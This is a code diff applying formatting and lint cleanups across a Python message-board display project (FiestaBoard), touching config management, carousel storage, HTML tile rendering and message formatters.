+            else self._last_text,
         }
 
-    def would_send(self, text: str = None, characters: list[list[int]] = None) -> bool:
+    def would_send(self, text: str | None = None, characters: list[list[int]] | None = None) -> bool:
         """
         Check if a message would actually be sent (i.e., is it different from cached).
 

--- a/src/board_html_renderer.py
+++ b/src/board_html_renderer.py
@@ -64,6 +64,7 @@ ALL_COLOR_CODES: dict[str, str] = {**COLOR_CODE_MAP, **NAMED_COLORS}
 # Token parsing — mirrors parseLine() in board-display.tsx
 # ---------------------------------------------------------------------------
 
+
 class _CharToken:
     __slots__ = ("value",)
 
@@ -234,22 +235,14 @@ def _tile_html(token: object, row: int, col: int, is_note: bool) -> str:
     note_cls = " note" if is_note else ""
     style = f'style="--r:{row};--c:{col};"'
     if isinstance(token, _ColorToken):
-        return (
-            f'<div class="tile{note_cls}" {style}>'
-            f'<div class="swatch" style="background:{token.hex};"></div>'
-            f"</div>"
-        )
+        return f'<div class="tile{note_cls}" {style}><div class="swatch" style="background:{token.hex};"></div></div>'
     # Character token
     ch = token.value if isinstance(token, _CharToken) else " "
     if ch == " ":
         return f'<div class="tile{note_cls}" {style}></div>'
     is_heart = ch == "♥"
     char_cls = " heart" if is_heart else ""
-    return (
-        f'<div class="tile{note_cls}" {style}>'
-        f'<span class="char{char_cls}">{html.escape(ch)}</span>'
-        f"</div>"
-    )
+    return f'<div class="tile{note_cls}" {style}><span class="char{char_cls}">{html.escape(ch)}</span></div>'
 
 
 def render_board_html(
@@ -283,10 +276,7 @@ def render_board_html(
     label_html = ""
     if page_name:
         safe_name = html.escape(page_name)
-        label_html = (
-            f'<div class="label"><strong>{safe_name}</strong> '
-            f"&middot; {device_type} {cols}&times;{rows}</div>"
-        )
+        label_html = f'<div class="label"><strong>{safe_name}</strong> &middot; {device_type} {cols}&times;{rows}</div>'
 
     title = html.escape(page_name or "FiestaBoard Preview")
     return (

--- a/src/carousels/models.py
+++ b/src/carousels/models.py
@@ -25,11 +25,12 @@ def is_carousel_id(ref_id: str) -> bool:
 
 def extract_carousel_uuid(carousel_id: str) -> str:
     """Strip the prefix and return the bare UUID portion."""
-    return carousel_id[len(CAROUSEL_ID_PREFIX):]
+    return carousel_id[len(CAROUSEL_ID_PREFIX) :]
 
 
 class Carousel(BaseModel):
     """A carousel – an ordered collection of pages that cycle automatically."""
+
     id: str = Field(default_factory=make_carousel_id)
     name: str = Field(min_length=1, max_length=100)
     page_ids: list[str] = Field(min_length=1)
@@ -76,6 +77,7 @@ class Carousel(BaseModel):
 
 class CarouselCreate(BaseModel):
     """Request model for creating a new carousel."""
+
     name: str = Field(min_length=1, max_length=100)
     page_ids: list[str] = Field(min_length=1)
     interval_seconds: int = Field(default=30, ge=5, le=3600)
@@ -83,6 +85,7 @@ class CarouselCreate(BaseModel):
 
 class CarouselUpdate(BaseModel):
     """Request model for updating an existing carousel."""
+
     name: str | None = Field(default=None, min_length=1, max_length=100)
     page_ids: list[str] | None = Field(default=None, min_length=1)
     interval_seconds: int | None = Field(default=None, ge=5, le=3600)

--- a/src/carousels/storage.py
+++ b/src/carousels/storage.py
@@ -25,17 +25,14 @@ class CarouselStorage:
         self._carousels: dict[str, Carousel] = {}
         self._load()
 
-        logger.info(
-            f"CarouselStorage initialized "
-            f"(file: {self.storage_file}, carousels: {len(self._carousels)})"
-        )
+        logger.info(f"CarouselStorage initialized (file: {self.storage_file}, carousels: {len(self._carousels)})")
 
     def _load(self) -> None:
         if not self.storage_file.exists():
             self._carousels = {}
             return
         try:
-            with open(self.storage_file) as f:
+            with self.storage_file.open() as f:
                 data = json.load(f)
 
             self._carousels = {}
@@ -57,16 +54,14 @@ class CarouselStorage:
 
     def _save(self) -> None:
         try:
-            data = {
-                "carousels": [c.model_dump() for c in self._carousels.values()]
-            }
+            data = {"carousels": [c.model_dump() for c in self._carousels.values()]}
             for item in data["carousels"]:
                 if item.get("created_at"):
                     item["created_at"] = item["created_at"].isoformat()
                 if item.get("updated_at"):
                     item["updated_at"] = item["updated_at"].isoformat()
 
-            with open(self.storage_file, "w") as f:
+            with self.storage_file.open("w") as f:
                 json.dump(data, f, indent=2)
 
             logger.debug(f"Saved {len(self._carousels)} carousels to storage")

--- a/src/config.py
+++ b/src/config.py
@@ -11,7 +11,7 @@ from .config_manager import get_config_manager
 logger = logging.getLogger(__name__)
 
 
-class classproperty:                         # noqa: N801
+class classproperty:
     """Descriptor that acts like @property but on the class itself.
 
     Python 3.13 removed support for stacking @classmethod on @property.
@@ -33,10 +33,7 @@ class Config:
     """
 
     # Valid transition strategies
-    VALID_TRANSITION_STRATEGIES = [
-        "column", "reverse-column", "edges-to-center",
-        "row", "diagonal", "random"
-    ]
+    VALID_TRANSITION_STRATEGIES = ["column", "reverse-column", "edges-to-center", "row", "diagonal", "random"]
 
     @classmethod
     def _get_cm(cls):
@@ -169,16 +166,17 @@ class Config:
         if locations:
             if isinstance(locations, list):
                 return locations
-            else:
-                return [locations]
+            return [locations]
 
         # Fallback to old single location format
         location = feature_config.get("location", "")
         if location:
-            return [{
-                "location": location,
-                "name": "HOME"  # Default name
-            }]
+            return [
+                {
+                    "location": location,
+                    "name": "HOME",  # Default name
+                }
+            ]
 
         return []
 
@@ -294,6 +292,7 @@ class Config:
         """Home Assistant entities (JSON string for compatibility)."""
         entities = cls._get_feature("home_assistant").get("entities", [])
         import json
+
         return json.dumps(entities)
 
     @classproperty
@@ -374,8 +373,7 @@ class Config:
         if stop_codes:
             if isinstance(stop_codes, list):
                 return stop_codes
-            else:
-                return [stop_codes]
+            return [stop_codes]
 
         # Fallback to old single stop_code format
         stop_code = feature_config.get("stop_code", "")
@@ -439,7 +437,7 @@ class Config:
         if station_ids:
             if isinstance(station_ids, list):
                 return station_ids
-            elif isinstance(station_ids, str):
+            if isinstance(station_ids, str):
                 return [station_ids]
 
         # Fallback to old station_id format for backward compatibility
@@ -448,7 +446,7 @@ class Config:
             # Migrate single station_id to array format
             if isinstance(station_id, list):
                 return station_id
-            elif isinstance(station_id, str):
+            if isinstance(station_id, str):
                 return [station_id]
 
         return []
@@ -500,8 +498,7 @@ class Config:
         if routes:
             if isinstance(routes, list):
                 return routes
-            else:
-                return [routes]
+            return [routes]
 
         # Fallback to old single route format
         origin = feature_config.get("origin", "")
@@ -509,11 +506,7 @@ class Config:
         destination_name = feature_config.get("destination_name", "DOWNTOWN")
 
         if origin and destination:
-            return [{
-                "origin": origin,
-                "destination": destination,
-                "destination_name": destination_name
-            }]
+            return [{"origin": origin, "destination": destination, "destination_name": destination_name}]
 
         return []
 
@@ -587,6 +580,7 @@ class Config:
         try:
             # Trigger migration if needed (on first call)
             from .config_manager import get_config_manager
+
             config_manager = get_config_manager()
             config_manager.migrate_silence_schedule_to_utc()
 
@@ -596,6 +590,7 @@ class Config:
 
             # Use TimeService to check if we're in the window
             from .time_service import get_time_service
+
             time_service = get_time_service()
 
             return time_service.is_time_in_window(start_time, end_time)
@@ -624,7 +619,7 @@ class Config:
         if isinstance(symbols, list):
             # Limit to 5 symbols max
             return symbols[:5]
-        elif isinstance(symbols, str):
+        if isinstance(symbols, str):
             return [symbols] if symbols else []
         return []
 
@@ -712,6 +707,8 @@ class Config:
             "weather_key_set": bool(cls.WEATHER_API_KEY),
             # Transition settings (only available in Local API mode)
             "transition_strategy": cls.BOARD_TRANSITION_STRATEGY if cls.BOARD_API_MODE.lower() == "local" else None,
-            "transition_interval_ms": cls.BOARD_TRANSITION_INTERVAL_MS if cls.BOARD_API_MODE.lower() == "local" else None,
+            "transition_interval_ms": cls.BOARD_TRANSITION_INTERVAL_MS
+            if cls.BOARD_API_MODE.lower() == "local"
+            else None,
             "transition_step_size": cls.BOARD_TRANSITION_STEP_SIZE if cls.BOARD_API_MODE.lower() == "local" else None,
         }

--- a/src/config_manager.py
+++ b/src/config_manager.py
@@ -49,6 +49,7 @@ PLUGIN_ID_RENAMES: dict[str, str] = {
     "baywheels": "lyft_bike_share",
 }
 
+
 # Per-rename adjustments to the migrated settings dict. Each handler
 # receives a deep-copied settings dict and returns the adjusted dict
 # that will be written under the new plugin id. Used to drop fields
@@ -254,7 +255,7 @@ DEFAULT_CONFIG: dict[str, Any] = {
             "color_rules": {
                 "change_percent": [
                     {"condition": ">", "value": 0, "color": "green"},  # Positive = green
-                    {"condition": "<", "value": 0, "color": "red"},   # Negative = red
+                    {"condition": "<", "value": 0, "color": "red"},  # Negative = red
                 ],
             },
         },
@@ -263,10 +264,10 @@ DEFAULT_CONFIG: dict[str, Any] = {
         "timezone": "America/Los_Angeles",  # User's timezone for display purposes
         "refresh_interval_seconds": 300,
         "output_target": "board",
-        "instance_name": "",       # Friendly name for this FiestaBoard install
-        "time_format": "12h",      # "12h" or "24h" for web UI time display
+        "instance_name": "",  # Friendly name for this FiestaBoard install
+        "time_format": "12h",  # "12h" or "24h" for web UI time display
         "date_format": "MM/DD/YYYY",  # "MM/DD/YYYY", "DD/MM/YYYY", or "YYYY-MM-DD"
-        "welcome_message": "",     # Custom board greeting; empty = use default
+        "welcome_message": "",  # Custom board greeting; empty = use default
     },
     # AI provider configuration for the "Gen AI" page-generation feature.
     # BYO-LLM: users supply their own OpenAI-compatible endpoint, key,
@@ -346,14 +347,12 @@ class ConfigManager:
         with self._file_lock:
             if self._config_path.exists():
                 try:
-                    with open(self._config_path) as f:
+                    with self._config_path.open() as f:
                         self._config = json.load(f)
                     logger.info(f"Loaded config from {self._config_path}")
 
                     # Snapshot features actually present before merge fills in defaults
-                    self._raw_features = self._deep_copy(
-                        self._config.get("features", {})
-                    )
+                    self._raw_features = self._deep_copy(self._config.get("features", {}))
 
                     # Merge with defaults to handle missing keys
                     self._config = self._merge_with_defaults(self._config)
@@ -390,7 +389,7 @@ class ConfigManager:
         """Create a deep copy of a nested dict/list structure."""
         if isinstance(obj, dict):
             return {k: self._deep_copy(v) for k, v in obj.items()}
-        elif isinstance(obj, list):
+        if isinstance(obj, list):
             return [self._deep_copy(item) for item in obj]
         return obj
 
@@ -448,12 +447,11 @@ class ConfigManager:
             return
 
         # Back up config before making changes
-        backup_path = self._config_path.with_suffix(
-            ".json.v1_backup"
-        )
+        backup_path = self._config_path.with_suffix(".json.v1_backup")
         if not backup_path.exists():
             try:
                 import shutil
+
                 shutil.copy2(self._config_path, backup_path)
                 logger.info(f"Created pre-migration backup at {backup_path}")
             except Exception as e:
@@ -465,20 +463,14 @@ class ConfigManager:
 
             for feature_key, plugin_id, feature_cfg in to_migrate:
                 plugin_cfg = {
-                    k: self._deep_copy(v)
-                    for k, v in feature_cfg.items()
-                    if k not in MIGRATION_EXCLUDED_FIELDS
+                    k: self._deep_copy(v) for k, v in feature_cfg.items() if k not in MIGRATION_EXCLUDED_FIELDS
                 }
                 self._config["plugins"][plugin_id] = plugin_cfg
-                logger.info(
-                    f"Auto-migrated feature '{feature_key}' -> plugin '{plugin_id}'"
-                )
+                logger.info(f"Auto-migrated feature '{feature_key}' -> plugin '{plugin_id}'")
 
             self._save_internal()
 
-        logger.info(
-            f"Auto-migration complete: {len(to_migrate)} feature(s) migrated to plugins"
-        )
+        logger.info(f"Auto-migration complete: {len(to_migrate)} feature(s) migrated to plugins")
 
     def _migrate_renamed_plugins(self) -> None:
         """Apply one-shot plugin id renames defined in PLUGIN_ID_RENAMES.
@@ -511,8 +503,7 @@ class ConfigManager:
                 # stale old entry without overwriting their config.
                 plugins.pop(old_id, None)
                 logger.info(
-                    f"Plugin rename '{old_id}' -> '{new_id}': new id already "
-                    f"present, dropping stale old config"
+                    f"Plugin rename '{old_id}' -> '{new_id}': new id already present, dropping stale old config"
                 )
                 renamed.append((old_id, new_id, False))
                 continue
@@ -540,14 +531,12 @@ class ConfigManager:
         with self._file_lock:
             self._save_internal()
 
-        logger.info(
-            f"Plugin rename migration complete: {len(renamed)} plugin(s) processed"
-        )
+        logger.info(f"Plugin rename migration complete: {len(renamed)} plugin(s) processed")
 
     def _save_internal(self) -> None:
         """Internal save without acquiring lock (called from locked context)."""
         try:
-            with open(self._config_path, "w") as f:
+            with self._config_path.open("w") as f:
                 json.dump(self._config, f, indent=2)
             logger.debug(f"Saved config to {self._config_path}")
         except OSError as e:
@@ -564,13 +553,11 @@ class ConfigManager:
         configuration.
         """
         v = value.lower().strip()
-        if v.startswith("your_") or v.startswith("your-"):
+        if v.startswith(("your_", "your-")):
             return True
-        if v.endswith("_here") or v.endswith("-here"):
+        if v.endswith(("_here", "-here")):
             return True
-        if v in ("changeme", "replace_me", "replace-me", "example", "placeholder"):
-            return True
-        return False
+        return v in ("changeme", "replace_me", "replace-me", "example", "placeholder")
 
     def _apply_env_overrides(self) -> None:
         """Apply environment variable overrides to config.
@@ -596,7 +583,7 @@ class ConfigManager:
             return self._config["features"][name]
 
         # Helper to apply string env var
-        def apply_str(config: dict, key: str, env_var: str, alt_env_var: str = None) -> bool:
+        def apply_str(config: dict, key: str, env_var: str, alt_env_var: str | None = None) -> bool:
             value = os.getenv(env_var, "").strip()
             if not value and alt_env_var:
                 value = os.getenv(alt_env_var, "").strip()
@@ -610,7 +597,7 @@ class ConfigManager:
             return False
 
         # Helper to apply int env var
-        def apply_int(config: dict, key: str, env_var: str, alt_env_var: str = None) -> bool:
+        def apply_int(config: dict, key: str, env_var: str, alt_env_var: str | None = None) -> bool:
             value = os.getenv(env_var, "").strip()
             if not value and alt_env_var:
                 value = os.getenv(alt_env_var, "").strip()
@@ -644,8 +631,12 @@ class ConfigManager:
         changed |= apply_str(board_config, "host", "BOARD_HOST", "FB_HOST")
         changed |= apply_str(board_config, "cloud_key", "BOARD_READ_WRITE_KEY", "FB_READ_WRITE_KEY")
         changed |= apply_str(board_config, "transition_strategy", "BOARD_TRANSITION_STRATEGY", "FB_TRANSITION_STRATEGY")
-        changed |= apply_int(board_config, "transition_interval_ms", "BOARD_TRANSITION_INTERVAL_MS", "FB_TRANSITION_INTERVAL_MS")
-        changed |= apply_int(board_config, "transition_step_size", "BOARD_TRANSITION_STEP_SIZE", "FB_TRANSITION_STEP_SIZE")
+        changed |= apply_int(
+            board_config, "transition_interval_ms", "BOARD_TRANSITION_INTERVAL_MS", "FB_TRANSITION_INTERVAL_MS"
+        )
+        changed |= apply_int(
+            board_config, "transition_step_size", "BOARD_TRANSITION_STEP_SIZE", "FB_TRANSITION_STEP_SIZE"
+        )
 
         # ==================== General Configuration ====================
         changed |= apply_str(general_config, "timezone", "TIMEZONE")
@@ -680,6 +671,7 @@ class ConfigManager:
         if entities_str and not home_assistant.get("entities"):
             try:
                 import json
+
                 home_assistant["entities"] = json.loads(entities_str)
                 logger.info("Applied HOME_ASSISTANT_ENTITIES from environment variable")
                 changed = True
@@ -764,7 +756,7 @@ class ConfigManager:
                 else:
                     result[key] = self._mask_sensitive(value, current_path)
             return result
-        elif isinstance(obj, list):
+        if isinstance(obj, list):
             return [self._mask_sensitive(item, path) for item in obj]
         return obj
 
@@ -857,9 +849,7 @@ class ConfigManager:
                 return False
 
             if feature_name not in self._config["features"]:
-                self._config["features"][feature_name] = self._deep_copy(
-                    DEFAULT_CONFIG["features"][feature_name]
-                )
+                self._config["features"][feature_name] = self._deep_copy(DEFAULT_CONFIG["features"][feature_name])
 
             # Only update provided fields
             for key, value in settings.items():
@@ -921,11 +911,14 @@ class ConfigManager:
         """
         with self._file_lock:
             return self._deep_copy(
-                self._config.get("ai_providers", {
-                    "enabled": False,
-                    "providers": [],
-                    "default_provider_id": None,
-                })
+                self._config.get(
+                    "ai_providers",
+                    {
+                        "enabled": False,
+                        "providers": [],
+                        "default_provider_id": None,
+                    },
+                )
             )
 
     def get_ai_providers_masked(self) -> dict[str, Any]:
@@ -960,9 +953,7 @@ class ConfigManager:
                 {"enabled": False, "providers": [], "default_provider_id": None},
             )
             existing_by_id = {
-                p.get("id"): p
-                for p in existing.get("providers", [])
-                if isinstance(p, dict) and p.get("id")
+                p.get("id"): p for p in existing.get("providers", []) if isinstance(p, dict) and p.get("id")
             }
 
             if "enabled" in settings:
@@ -1050,9 +1041,8 @@ class ConfigManager:
         # Validate features that are enabled
         features = config.get("features", {})
 
-        if features.get("weather", {}).get("enabled"):
-            if not features["weather"].get("api_key"):
-                errors.append("Weather API key is required when weather is enabled")
+        if features.get("weather", {}).get("enabled") and not features["weather"].get("api_key"):
+            errors.append("Weather API key is required when weather is enabled")
 
         if features.get("home_assistant", {}).get("enabled"):
             ha = features["home_assistant"]
@@ -1089,8 +1079,7 @@ class ConfigManager:
                 return False
 
             # Old format: "20:00" (5 chars), New format: "20:00-08:00" (11+ chars)
-            needs_migration = (len(start_time) == 5 and ":" in start_time and
-                             len(end_time) == 5 and ":" in end_time)
+            needs_migration = len(start_time) == 5 and ":" in start_time and len(end_time) == 5 and ":" in end_time
 
             if not needs_migration:
                 logger.debug("Silence schedule already in UTC format, no migration needed")
@@ -1119,7 +1108,9 @@ class ConfigManager:
             success = self.set_feature("silence_schedule", silence_config)
 
             if success:
-                logger.info(f"Successfully migrated silence schedule: {start_time} → {start_utc}, {end_time} → {end_utc}")
+                logger.info(
+                    f"Successfully migrated silence schedule: {start_time} → {start_utc}, {end_time} → {end_utc}"
+                )
             else:
                 logger.error("Failed to save migrated silence schedule")
 
@@ -1312,4 +1303,3 @@ class ConfigManager:
 def get_config_manager() -> ConfigManager:
     """Get the singleton ConfigManager instance."""
     return ConfigManager()
-

--- a/src/devices.py
+++ b/src/devices.py
@@ -14,6 +14,7 @@ DEVICE_TYPES = ("flagship", "note")
 
 class DeviceDimensions(NamedTuple):
     """Physical board dimensions for a device type."""
+
     rows: int
     cols: int
 
@@ -36,6 +37,7 @@ class BoardInstance:
     device type, display color, and connection settings.
     Each board has its own API credentials and connection mode.
     """
+
     id: str = field(default_factory=lambda: str(uuid.uuid4()))
     name: str = ""
     device_type: str = "flagship"

--- a/src/displays/__init__.py
+++ b/src/displays/__init__.py
@@ -2,4 +2,4 @@
 
 from .service import DisplayResult, DisplayService, get_display_service, reset_display_service
 
-__all__ = ["DisplayService", "DisplayResult", "reset_display_service", "get_display_service"]
+__all__ = ["DisplayResult", "DisplayService", "get_display_service", "reset_display_service"]

--- a/src/displays/service.py
+++ b/src/displays/service.py
@@ -10,11 +10,12 @@ import logging
 from dataclasses import dataclass
 from typing import Any
 
-from ..formatters.message_formatter import get_message_formatter
+from src.formatters.message_formatter import get_message_formatter
 
 # Import plugin system
 try:
-    from ..plugins import PluginRegistry, get_plugin_registry
+    from src.plugins import PluginRegistry, get_plugin_registry
+
     PLUGIN_SYSTEM_AVAILABLE = True
 except ImportError:
     PLUGIN_SYSTEM_AVAILABLE = False
@@ -27,6 +28,7 @@ logger = logging.getLogger(__name__)
 @dataclass
 class DisplayResult:
     """Result from fetching a display."""
+
     display_type: str
     formatted: str
     raw: dict[str, Any]
@@ -83,12 +85,14 @@ class DisplayService:
         displays = []
         for plugin_data in self._plugin_registry.list_plugins():
             plugin_id = plugin_data["id"]
-            displays.append({
-                "type": plugin_id,
-                "available": self._plugin_registry.is_enabled(plugin_id),
-                "description": plugin_data.get("description", ""),
-                "source": "plugin",
-            })
+            displays.append(
+                {
+                    "type": plugin_id,
+                    "available": self._plugin_registry.is_enabled(plugin_id),
+                    "description": plugin_data.get("description", ""),
+                    "source": "plugin",
+                }
+            )
         return displays
 
     def get_display(self, display_type: str) -> DisplayResult:
@@ -102,11 +106,7 @@ class DisplayService:
         """
         if not self._plugin_registry:
             return DisplayResult(
-                display_type=display_type,
-                formatted="",
-                raw={},
-                available=False,
-                error="Plugin system not initialized."
+                display_type=display_type, formatted="", raw={}, available=False, error="Plugin system not initialized."
             )
 
         # Validate the display type exists as a plugin
@@ -118,7 +118,7 @@ class DisplayService:
                 formatted="",
                 raw={},
                 available=False,
-                error=f"Unknown display type: {display_type}. Valid types: {valid_types}"
+                error=f"Unknown display type: {display_type}. Valid types: {valid_types}",
             )
 
         try:
@@ -133,27 +133,15 @@ class DisplayService:
                     formatted = str(plugin_result.data.get("formatted", "")) if plugin_result.data else ""
 
                 return DisplayResult(
-                    display_type=display_type,
-                    formatted=formatted,
-                    raw=plugin_result.data or {},
-                    available=True
+                    display_type=display_type, formatted=formatted, raw=plugin_result.data or {}, available=True
                 )
-            else:
-                return DisplayResult(
-                    display_type=display_type,
-                    formatted="",
-                    raw={},
-                    available=False,
-                    error=plugin_result.error
-                )
+            return DisplayResult(
+                display_type=display_type, formatted="", raw={}, available=False, error=plugin_result.error
+            )
         except Exception as e:
             logger.error(f"Error fetching data for plugin {display_type}: {e}", exc_info=True)
             return DisplayResult(
-                display_type=display_type,
-                formatted="",
-                raw={},
-                available=False,
-                error=f"Error fetching data: {e}"
+                display_type=display_type, formatted="", raw={}, available=False, error=f"Error fetching data: {e}"
             )
 
 

--- a/src/formatters/__init__.py
+++ b/src/formatters/__init__.py
@@ -1,2 +1,1 @@
 """Message formatting modules for board display."""
-

--- a/src/formatters/message_formatter.py
+++ b/src/formatters/message_formatter.py
@@ -10,7 +10,7 @@ Use them as decorative indicators followed by a space, e.g., "{green} SSID: netw
 
 import logging
 
-from ..board_chars import get_weather_symbol
+from src.board_chars import get_weather_symbol
 
 logger = logging.getLogger(__name__)
 
@@ -23,7 +23,6 @@ class MessageFormatter:
 
     def __init__(self):
         """Initialize message formatter."""
-        pass
 
     def format_weather(self, weather_data: dict) -> str:
         """
@@ -73,7 +72,7 @@ class MessageFormatter:
             lines.append(" | ".join(info_parts))
 
         # Ensure we don't exceed 6 rows
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
     def format_datetime(self, datetime_data: dict) -> str:
         """
@@ -107,7 +106,7 @@ class MessageFormatter:
             else:
                 lines.append(time_str)
 
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
     def format_guest_wifi(self, ssid: str, password: str) -> str:
         """
@@ -133,14 +132,14 @@ class MessageFormatter:
 
         # SSID with blue tile indicator
         ssid_line = f"{{{{blue}}}} {ssid}"
-        lines.append(ssid_line[:self.MAX_COLS + 8])  # +8 for {{blue}} marker
+        lines.append(ssid_line[: self.MAX_COLS + 8])  # +8 for {{blue}} marker
 
         # Password with violet tile indicator
         pass_line = f"{{{{violet}}}} {password}"
-        lines.append(pass_line[:self.MAX_COLS + 10])  # +10 for {{violet}} marker
+        lines.append(pass_line[: self.MAX_COLS + 10])  # +10 for {{violet}} marker
 
         # Ensure we don't exceed 6 rows
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
     def format_star_trek_quote(self, quote_data: dict) -> str:
         """
@@ -167,7 +166,7 @@ class MessageFormatter:
         series_config = {
             "tng": {"name": "TNG", "color": "{{yellow}}"},
             "voyager": {"name": "VOY", "color": "{{blue}}"},
-            "ds9": {"name": "DS9", "color": "{{red}}"}
+            "ds9": {"name": "DS9", "color": "{{red}}"},
         }
         config = series_config.get(series, {"name": series.upper(), "color": ""})
         series_display = config["name"]
@@ -185,13 +184,13 @@ class MessageFormatter:
         if len(lines) < self.MAX_ROWS:
             if series_color and len(lines) < self.MAX_ROWS - 1:
                 # Room for character line and series line with color
-                lines.append(f"- {character}"[:self.MAX_COLS])
-                lines.append(f"{series_color} {series_display}"[:self.MAX_COLS + 8])
+                lines.append(f"- {character}"[: self.MAX_COLS])
+                lines.append(f"{series_color} {series_display}"[: self.MAX_COLS + 8])
             else:
                 # Combine into one line
-                lines.append(f"- {character} ({series_display})"[:self.MAX_COLS])
+                lines.append(f"- {character} ({series_display})"[: self.MAX_COLS])
 
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
     def format_house_status(self, status_data: dict[str, dict]) -> str:
         """
@@ -253,10 +252,9 @@ class MessageFormatter:
             line = f"{indicator} {display_name}: {status_text}"
             lines.append(line)
 
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
-    def format_combined(self, weather_data: dict | None,
-                       datetime_data: dict | None) -> str:
+    def format_combined(self, weather_data: dict | None, datetime_data: dict | None) -> str:
         """
         Format combined weather and datetime display.
 
@@ -319,7 +317,7 @@ class MessageFormatter:
                 lines.append(f"{location}: {temp_color} {temp}F")
 
         # Ensure we don't exceed 6 rows
-        result = "\n".join(lines[:self.MAX_ROWS])
+        result = "\n".join(lines[: self.MAX_ROWS])
 
         # Truncate each line to 22 characters if needed (accounting for color markers)
         result_lines = result.split("\n")
@@ -344,17 +342,16 @@ class MessageFormatter:
             Color marker string (e.g., "{{red}}" for hot)
         """
         if temp >= 90:
-            return "{{red}}"     # Very hot
-        elif temp >= 80:
+            return "{{red}}"  # Very hot
+        if temp >= 80:
             return "{{orange}}"  # Hot
-        elif temp >= 70:
+        if temp >= 70:
             return "{{yellow}}"  # Warm
-        elif temp >= 60:
-            return "{{green}}"   # Comfortable
-        elif temp >= 45:
-            return "{{blue}}"    # Cool
-        else:
-            return "{{violet}}"  # Cold
+        if temp >= 60:
+            return "{{green}}"  # Comfortable
+        if temp >= 45:
+            return "{{blue}}"  # Cool
+        return "{{violet}}"  # Cold
 
     def split_into_lines(self, text: str, max_lines: int = MAX_ROWS) -> list[str]:
         """
@@ -430,7 +427,7 @@ class MessageFormatter:
 
         # Stop name (if available and fits)
         if stop_name:
-            lines.append(stop_name[:self.MAX_COLS])
+            lines.append(stop_name[: self.MAX_COLS])
 
         # Format arrival times
         if arrivals:
@@ -458,16 +455,15 @@ class MessageFormatter:
             if is_delayed:
                 arrival_line = f"{{{{red}}}}{arrival_line}"
 
-            lines.append(arrival_line[:self.MAX_COLS + 10])  # Account for color markers
+            lines.append(arrival_line[: self.MAX_COLS + 10])  # Account for color markers
         else:
             lines.append(f"{line}: No arrivals")
 
         # Add delay description if present
         if delay_description and len(lines) < self.MAX_ROWS:
-            lines.append(delay_description[:self.MAX_COLS])
+            lines.append(delay_description[: self.MAX_COLS])
 
-        return "\n".join(lines[:self.MAX_ROWS])
-
+        return "\n".join(lines[: self.MAX_ROWS])
 
     def format_stocks(self, stocks_data: dict) -> str:
         """
@@ -495,7 +491,7 @@ class MessageFormatter:
                 lines.append(formatted)
 
         # Ensure we don't exceed 6 rows
-        return "\n".join(lines[:self.MAX_ROWS])
+        return "\n".join(lines[: self.MAX_ROWS])
 
 
 def get_message_formatter() -> MessageFormatter:

--- a/src/main.py
+++ b/src/main.py
@@ -21,9 +21,7 @@ from .triggers.service import get_trigger_service
 
 # Configure logging
 logging.basicConfig(
-    level=logging.INFO,
-    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
-    datefmt='%Y-%m-%d %H:%M:%S'
+    level=logging.INFO, format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", datefmt="%Y-%m-%d %H:%M:%S"
 )
 
 logger = logging.getLogger(__name__)
@@ -99,7 +97,7 @@ class DisplayService:
     def _get_board_read_interval(self) -> int:
         """Return the board-state read poll interval in seconds based on API mode."""
         polling = get_settings_service().get_polling_settings()
-        use_cloud = getattr(self.vb_client, 'use_cloud', False) if self.vb_client else False
+        use_cloud = getattr(self.vb_client, "use_cloud", False) if self.vb_client else False
         return polling.board_read_interval_cloud if use_cloud else polling.board_read_interval_local
 
     def _board_poll_loop(self) -> None:
@@ -159,7 +157,9 @@ class DisplayService:
             # Log transition settings if configured
             transition = Config.get_transition_settings()
             if transition["strategy"]:
-                logger.info(f"Default transition: {transition['strategy']} (interval={transition['step_interval_ms']}ms, step_size={transition['step_size']})")
+                logger.info(
+                    f"Default transition: {transition['strategy']} (interval={transition['step_interval_ms']}ms, step_size={transition['step_size']})"
+                )
         except Exception as e:
             logger.error(f"Failed to initialize board client: {e}")
             return False
@@ -250,7 +250,7 @@ class DisplayService:
                         logger.info(f"Temporary override expired, applying revert: {override.revert_mode}")
                         if override.revert_mode == "blank":
                             return self._send_blank_board()
-                        elif override.revert_mode == "page" and override.revert_page_id:
+                        if override.revert_mode == "page" and override.revert_page_id:
                             settings_service.set_active_page_id(override.revert_page_id)
                         # "schedule" (and fallback): clear content cache so next tick rerenders
                         self._last_active_page_content = None
@@ -260,6 +260,7 @@ class DisplayService:
                 # Schedule mode: Use schedule service to determine page
                 # Use TimeService to get current time in configured timezone
                 from .time_service import get_time_service
+
                 time_service = get_time_service()
                 now = time_service.get_current_time()
                 current_time = now.time()
@@ -272,7 +273,9 @@ class DisplayService:
                 if active_page_id:
                     logger.debug(f"Schedule mode: Active page determined by schedule: {active_page_id}")
                 else:
-                    logger.debug(f"Schedule mode: No matching schedule for {current_day} {current_time.strftime('%H:%M')}")
+                    logger.debug(
+                        f"Schedule mode: No matching schedule for {current_day} {current_time.strftime('%H:%M')}"
+                    )
             elif active_page_id is None:
                 # Manual mode: Use manual active page setting
                 active_page_id = settings_service.get_active_page_id()
@@ -342,8 +345,7 @@ class DisplayService:
             content_to_send = current_content
 
             # Normal mode (not in silence) - check if content changed
-            if (current_content == self._last_active_page_content and
-                    active_page_id == self._last_active_page_id):
+            if current_content == self._last_active_page_content and active_page_id == self._last_active_page_id:
                 logger.debug("Active page content unchanged, skipping send")
                 return False
             logger.info(f"Active page content changed, sending to board: {active_page_id}")
@@ -357,18 +359,21 @@ class DisplayService:
             # Get transition settings - use page-level if set, otherwise system defaults
             system_transition = settings_service.get_transition_settings()
             strategy = page.transition_strategy if page.transition_strategy else system_transition.strategy
-            interval_ms = page.transition_interval_ms if page.transition_interval_ms is not None else system_transition.step_interval_ms
-            step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            interval_ms = (
+                page.transition_interval_ms
+                if page.transition_interval_ms is not None
+                else system_transition.step_interval_ms
+            )
+            step_size = (
+                page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            )
 
             # Send to board
             dims = get_dimensions(page.device_type)
